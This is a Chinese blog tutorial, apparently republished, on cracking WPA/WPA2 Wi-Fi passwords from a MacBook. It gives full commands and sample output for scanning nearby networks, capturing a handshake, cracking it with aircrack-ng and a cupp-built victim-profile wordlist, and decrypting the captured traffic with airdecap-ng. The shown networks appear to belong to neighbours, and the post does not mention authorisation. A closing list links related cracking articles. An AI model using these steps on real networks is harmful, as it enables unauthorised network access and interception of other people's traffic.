MacOS破解WiFi(WPA、WPA2)

article/2025/9/23 15:37:31

2020年的寒假过得属实弟弟
我在家里默默地刷安全牛的教程,最新刷到了“无线攻击”这一章,虽然在学校的机器上安装了Kali虚机,但是没有Usb无线网卡。于是用MacBook尝试了一下。
PS: 本文参考了网络上众多的文章,但是有我自己发挥的部分。由于现在绝大部分无线网络的加密方法都是WPA、WPA2,弱点比较大的WEP我现在还没碰到过,已经很少使用,而WPA、WPA2几乎没有弱点,想要破解只能暴力穷举,理论上只要你的密码设置的足够复杂,就是不可破解的(但谁会把Wifi密码设置的这么复杂)

如何发现附近的网络

这里的发现网络,不是单指如何获得附近有哪些WiFi,而是附近有哪些WiFi,他们分别用的什么加密密钥。在Kali上实现这一点,我们需要使用airmon-ng来发现附近的WiFi,而MacBook自带了强大的airport工具。

使用airport

为了方便我们使用airport,先在命令行中执行以下命令:

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

上述命令让我们可以在命令行直接输入airport来使用它。

发现附近网络

在命令行输入:

airport -s

得到如下结果:

Princeling-Mac at /opt ❯ airport -sSSID BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)FAST_236864 cc:34:29:23:68:64 -81  6,-1    Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)FAST_20C20A 78:eb:14:20:c2:0a -77  12      Y  -- WPA(PSK/TKIP,AES/TKIP) WPA2(PSK/TKIP,AES/TKIP)FAST_11D9DC c0:61:18:11:d9:dc -59  7       Y  -- WPA(PSK/TKIP,AES/TKIP) WPA2(PSK/TKIP,AES/TKIP)iTV-KtYh 46:7b:bb:b9:c5:d0 -59  9       Y  US WPA(PSK/TKIP,AES/TKIP)ChinaNet-KtYh 44:7b:bb:a9:c5:d0 -59  9       Y  US WPA(PSK/TKIP,AES/TKIP)

等待握手信号

事实上,我们的暴力穷举不可能是不停的给路由器发送请求,这种做法吃力又不讨好。网络上有很多描述WPA破解原理的文章,可以去阅读。简单地说,我们需要侦听到一个用户的正确登录,然后获取登录过程中的两组密钥,之后就可以离线破解了。

侦听数据

airport en0 sniff 7

en0 是你的无线网卡,这个信息可以通过输入

ifconfig

得到。

如果有很多网卡,选择你用来连接Wifi的那个。

7 是上文中,发现附近网络的CHANNEL列,需要和你想要破解的目标网络一致。

运行该命令的时候,wifi的图标会发生改变。

这个时候你的网络连接也会断开,按下ctrl+c结束侦听。

分析数据

不可避免的,还是要安装airmon-ng

brew install airmon-ng

安装完成后:

aircrack-ng /tmp/airportSniffLbhZSp.cap
Princeling-Mac at /opt ❯ aircrack-ng /tmp/airportSniffLbhZSp.cap
Opening /tmp/airportSniffLbhZSp.cap
Read 8351 packets.#  BSSID              ESSID                     Encryption1  C0:61:18:11:D9:DC  FAST_11D9DC               WPA (1 handshake)2  CC:34:29:23:68:64  FAST_236864               No data - WEP or WPAIndex number of target network ?

在抓包过程中,我用手机登录了一下无线网FAST_11D9DC。可以看到airport已经抓到了一组握手数据。

在“Index number of target network ?”这里输入想要破解的wifi,由于2没有握手数据,所以我们输入1。

aircrack破解

aircrack-ng -w dict.txt -b c0:61:18:11:d9:dc /tmp/airportSniffLbhZSp.cap

dict.txt 是字典文件,c0:61:18:11:d9:dc 是发现附近网络中的BSSID,/tmp/airportSniffLbhZSp.cap是数据包。

字典文件在哪儿?

1. 互联网下载

在网络上有很多人搜集到的wifi字典,如果是公共场合,这些字典的命中率还是很高的。但是字典很庞大,暴力穷举需要消耗很长时间。

2. 自己制作

如果是在家庭、私人场合的WiFi,字典的质量就显得很重要。这里推荐一个社工字典制作程序。可以去github搜索cupp下载。或者点击直达

简单演示一下cupp的使用。

python3 cupp.py -I
Princeling-Mac at ~/Documents/GitHub/cupp ❯ python3 cupp.py -I___________cupp.py!                 # Common\                     # User\   ,__,             # Passwords\  (oo)____         # Profiler(__)    )\||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ][ Mebus | https://github.com/Mebus/][+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)> First Name: wanglei
> Surname:
> Nickname: princeling
> Birthdate (DDMMYYYY):> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):> Pet's name:
> Company name:> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to wanglei.txt, counting 68 words.
[+] Now load your pistolero with wanglei.txt and shoot! Good luck!

不知道就一路回车下去,填写一些相关信息,就可以生成字典了。

然后用这个字典破解wifi内容。

如果你的字典中包含密码,则会出现如下界面:

                          Aircrack-ng 1.5.2[00:00:00] 8/1 keys tested (88.65 k/s)Time left: 0 seconds                                     800.00%KEY FOUND! [ 88888888 ]Master Key     : 26 FB 23 5F FE 0B 39 0A C1 12 F3 30 55 FF EE 02CB 7E EA 13 B0 CE D6 7E BB 7E AA 52 1B EA 2E 02Transient Key  : 8D E6 57 44 42 BE 95 C2 EC 75 60 FA CA 1A 1A C1C8 31 46 C4 4D DB 98 4D 34 D7 5A D0 15 9F BD 426C 9C 96 5C FC AE 24 39 83 1D A8 89 C7 71 F9 4A64 D5 DA FB 24 7E 91 47 E6 35 DD 9A 87 A6 A2 5BEAPOL HMAC     : 8D 62 A3 8A 42 D1 68 EA 4B 89 FC FC B6 BC C9 AA

说明破解成功。

airdecap分析包

现在我们拿到了密码。但是如果折腾了这么半天,目的就是为了蹭WiFi,感觉有点呆呆的。

有了WiFi的密码,实际上我们可以对WiFi的数据包进行解包,工具就是airdecap。

这个时候再拿出刚刚抓取的数据包,用wireshark打开。
在这里插入图片描述
可以看到全都是802.11的协议,并且数据帧全都是加密的数据。

在命令行输入:

airdecap-ng -e FAST_11D9DC -b c0:61:18:11:d9:dc -p 88888888 ./Downloads/11d9dc.cap

e是essid,b是bssid,p是破解出来的WiFi密码。

运行成功后,会在目标目录生成对应的dec文件。

在这里插入图片描述
再用WireShark打开,就能看到解密后的包内容了。


http://chatgpt.dhexx.cn/article/x9n4WhmZ.shtml

相关文章

wpa或者wpa2暴力破解WiFi

现在看看其实很多渗透测试的时候你需要在内网的情况下进行测试。那既然是内网,你得必须混进内网的网络中去对吧。那么WiFi的破解就是第一个突破口了,当然企业级的WiFi不一样哈,但是家用的完全可以了哈。当然,其实不只这种攻击哈。…

无线安全WLAN WEP破解(一)

WEP加密破解 一. 接入无线网卡 点击可移动设备,选择连接我们的无线网卡设备。 二、开启无线网卡,在特定的AP频道开启监控模式 是将网卡开启成monitor模式. monitor模式可以使网卡监听任何一个数据包. 正常情况下, 我们只能接收到发送给我们…

【Kali】WPA / WPA2破解

文章目录 WPA / WPA2简介攻击WPA使用Aircrack-ng进行WPA破解用Cowpatty进行WPA破解使用GPU进行WPA破解PyritOclHashcatWifite WPA / WPA2简介 WPA / WPA2是Wi-Fi联盟开发的两个不同版本的安全协议,用以替代WEP作为802.11协议的安全标准。 WPA协议于2003年首次发布&a…

使用AirCrack破解wifi密码(wpa/wpa2)

本文使用的是Kali Linux,该系统主要以渗透测试及’破解wifi密码’闻名。 如果你使用Macbook,看这里:使用macbook破解WPA/WPA2 wifi密码 要求: 安装有Kali Linux的计算机支持监控模式的网卡,笔记本电脑一般都支持字典…

利用PIN码破解wifi密码(WPA2-PSK)

無奈宿舍無線網絡實在太差,校園網連個QQ都登錄不上,看到XX地方的信號居然是滿格,難免想讓我做一次網絡安全方面的實驗。聲明下,僅僅是實驗而已,禁用於非法目的。 首先,亂扯一些東西,看看就好&a…

【无线网络渗透 】如何使用Aircrack-ng 系列工具进行WPA/WPA2的监听和破解

版权声明:本文为博主tonyzhejiang原创文章,转载请注明来源博客:http://blog.csdn.net/tonyzhejiang) 目录: 前言什么是 Aircrack-ng所需工具参数介绍破解步骤帮助 1.前言 1.1 声明 注意:本文章是审核家庭无线路…

从零开始,教你如何破解WEP、WPA无线网络(完整版)

第一章、引言 近些年无线技术 发展迅速,越来越多的用户开始使用无线网络,最近新搬到一小区没有安装网络,后面想到以前出差时在机场用过无线网络,小区内是否也有无线网络呢?随便一搜,果然有几个无线网…

教你如何破解你家附近的wep wpa wpa2加密方式的密码~~~转的懒得写了。

来源: 童嘉旻◆Kevin的日志 首先申明一点 此行为只是为了大家交流和保护自己无限路由器安全。 但是必须是BT4,5所支持网卡。我的网卡是Realtek USB8187. 自己网卡能否支持请在网上查阅。还有我的这个BT5是英文版本,如果你们是中文版请对号入座&#x…

无线网络密码破解WPA/WPA2教程(包教包会)

在动手破解WPA/WPA2前,应该先了解一下基础知识,本文适合新手阅读 首先大家要明白一种数学运算,它叫做哈希算法(hash),这是一种不可逆运算,你不能通过运算结果来求解出原来的未知数是多少&#…

无线安全之破解WPA/WPA2 加密WiFi

由于古老的WPE加密的WiFi已经几乎没有了,所以这里我就不去细说如何破解WPE加密的WiFi了。今天就来聊聊 如何来使用Kali Linux来破解Wpa/Wpa2加密的WiFi。本次破解WiFi使用的是Kali Linux下经典的aircrack-ng 准备 可以使用无线网络的Kali Li…

wpa或者wpa2暴力破解WiFi(因为wep已经很少有人使用了,所以略过)

现在看看其实很多渗透测试的时候你需要在内网的情况下进行测试。那既然是内网,你得必须混进内网的网络中去对吧。那么WiFi的破解就是第一个突破口了,当然企业级的WiFi不一样哈,但是家用的完全可以了哈。当然,其实不只这种攻击哈。…

无线渗透(下)—企业级WPA破解

0x00. 企业级WPA/WPA2简介 WPA/WPA2企业版:在大型企业网络中,通常采用802.1X的接入认证方式。802.1X认证是一种基于接口的网络接入控制,用户提供认证所需的凭证,如用户名和密码,通过特定的用户认证服务器(…

基于WPA的暴力破解(JAVA实现破解WIFI)

基于WPA的暴力破解 基于WPA四次握手协议的暴力破解 在KRACK漏洞发现前,已知的破解WPA方法只有字典攻击。对于WPA-PSK这套体系,如果没有密码几乎没法窃听他的通信,在有了密码的情况下 WPA 的窃听也不具有 WEP 中窃听的随意性,在 WPA 中 SNonce,ANonce(随机数) 也很好的…

无线渗透(中)--WPS破解

0x00. 前言 基于第一篇文章WPA密码破解的反馈,有人提问说能否写一下关于WPA2的文章。笔者在这里回答一下,破解WPA2的流程和WPA是一样的,WPA2只是采用了更加复杂可靠的加密算法(利用CCMP替代了TKIP,AES替代了RC4&#…

WPA2破解教程(详细步骤)

本博客内容旨在技术学习交流,仅供学习参考之用,请勿用于任何非法用途,否则后果作者概不负责。 一、前言 本人前段时间在研究WiFi破解(WPA2)的相关原理和具体步骤,期间在网上搜索了很多资料,也走…

Ubuntu 下 Wine的安装与使用(以22.04为例)

安装 验证是否为64位架构 dpkg --print-architecture返回amd64 查看是否安装了32位架构 dpkg --print-foreign-architectures若显示i386则跳过此步,否则执行 sudo dpkg --add-architecture i386再次检查 dpkg --print-foreign-architectures下载并添加 WineHQ…

wine 的使用方法

wine中文乱码的终极解决方法 准备字体:simfang.ttc 是许多 Windows 应用默认使用 simfang.ttc 字体。下载simfang.ttc 字体 simsun.ttc复制到/home/user/.wine/drive_c/windows/fonts里面。 进入 Wine 的注册表 “/home/用户名/.wine/dosdevices/c:/windows/”&…

linux安装wine

wine安装过程记录 1 2 You will find documentation on https://www.winehq.org/documentation 3 For help with installing from a package or from source, please consult the Getting Wine chapter of the User’s guide. 4 5 https://wiki.winehq.org/Category:Di…

如何在CentOS上安装和使用Wine

转载:http://ghoulich.xninja.org/2016/08/09/install-and-use-wine-on-centos/ 最近想要把工作环境从Windows切换到Linux系统,但公司的IM软件(豆芽)只有Windows和MAC的版本,很多常用工具也只有Windows的版本&#xf…

wine 安装与使用(ubuntu中安装windows下软件)

转载自:https://blog.csdn.net/qq_34638161/article/details/81271977 https://m.linuxidc.com/Linux/2007-11/8759.htm https://blog.csdn.net/Gerald_Jones/article/details/80781378 一、安装 wine :能够在多种 POSIX-compliant 操作系统&#xff08…